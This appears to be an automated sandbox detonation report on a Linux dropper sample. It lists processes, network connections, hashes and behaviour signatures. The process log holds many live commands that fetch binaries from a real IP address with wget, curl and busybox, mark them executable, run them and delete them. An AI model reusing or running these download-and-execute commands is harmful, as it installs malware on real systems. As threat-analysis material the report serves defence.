[/bin/busybox wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/chmod

[chmod 777 DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI

[./DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/rm

[rm DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/wget

[wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/chmod

[chmod 777 BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2

[./BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/rm

[rm BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/wget

[wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/chmod

[chmod 777 s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B

[./s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/rm

[rm s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/wget

[wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/chmod

[chmod 777 f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp

[./f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/rm

[rm f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/wget

[wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/chmod

[chmod 777 rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu

[./rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/rm

[rm rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/wget

[wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/chmod

[chmod 777 qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr

[./qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/rm

[rm qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/wget

[wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/chmod

[chmod 777 jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY

[./jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/rm

[rm jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/wget

[wget http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/chmod

[chmod 777 iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY

[./iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/rm

[rm iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

Network

Country Destination Domain Proto
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
N/A 224.0.0.251:5353 udp
US 216.126.231.240:80 216.126.231.240 tcp
GB 89.187.167.39:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-20 04:21

Reported

2024-11-20 04:23

Platform

debian9-armhf-20240611-en

Max time kernel

65s

Max time network

68s

Command Line

[/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu N/A
N/A /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr N/A
N/A /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY N/A
N/A /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY N/A
N/A /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 N/A
N/A /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 N/A
N/A /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 N/A
N/A /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 N/A
N/A /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p N/A
N/A /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP N/A
N/A /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI N/A
N/A /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 N/A
N/A /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B N/A
N/A /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp N/A
N/A /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 N/A
N/A /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 N/A
N/A /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 N/A
N/A /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 N/A
N/A /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p N/A
N/A /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP N/A
N/A /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI N/A
N/A /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 N/A
N/A /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B N/A
N/A /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp N/A
N/A /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu N/A
N/A /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr N/A
N/A /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY N/A
N/A /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /usr/bin/curl N/A
File opened for modification /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /usr/bin/curl N/A
File opened for modification /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /usr/bin/curl N/A
File opened for modification /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /usr/bin/curl N/A
File opened for modification /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /usr/bin/curl N/A
File opened for modification /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /usr/bin/curl N/A
File opened for modification /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /usr/bin/curl N/A
File opened for modification /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /usr/bin/curl N/A
File opened for modification /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /usr/bin/curl N/A
File opened for modification /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /usr/bin/curl N/A
File opened for modification /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /usr/bin/curl N/A
File opened for modification /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /usr/bin/curl N/A
File opened for modification /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /usr/bin/curl N/A
File opened for modification /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /usr/bin/curl N/A
File opened for modification /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /usr/bin/curl N/A
File opened for modification /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /usr/bin/curl N/A
File opened for modification /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /usr/bin/curl N/A
File opened for modification /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /usr/bin/curl N/A
File opened for modification /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /usr/bin/curl N/A
File opened for modification /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /usr/bin/curl N/A
File opened for modification /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /usr/bin/curl N/A
File opened for modification /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /usr/bin/curl N/A
File opened for modification /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY /usr/bin/curl N/A
File opened for modification /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /usr/bin/curl N/A
File opened for modification /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /usr/bin/curl N/A
File opened for modification /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY /usr/bin/curl N/A
File opened for modification /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /usr/bin/curl N/A
File opened for modification /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /usr/bin/curl N/A

Processes

/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN

[/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/chmod

[chmod 777 rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu

[./rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/rm

[rm rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/wget

[wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/chmod

[chmod 777 qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr

[./qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/rm

[rm qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/wget

[wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/chmod

[chmod 777 jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY

[./jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/rm

[rm jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/wget

[wget http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/chmod

[chmod 777 iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY

[./iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/rm

[rm iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/usr/bin/wget

[wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/chmod

[chmod 777 cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4

[./cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/rm

[rm cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/wget

[wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/chmod

[chmod 777 IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4

[./IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/rm

[rm IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/wget

[wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/chmod

[chmod 777 Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0

[./Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/rm

[rm Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/wget

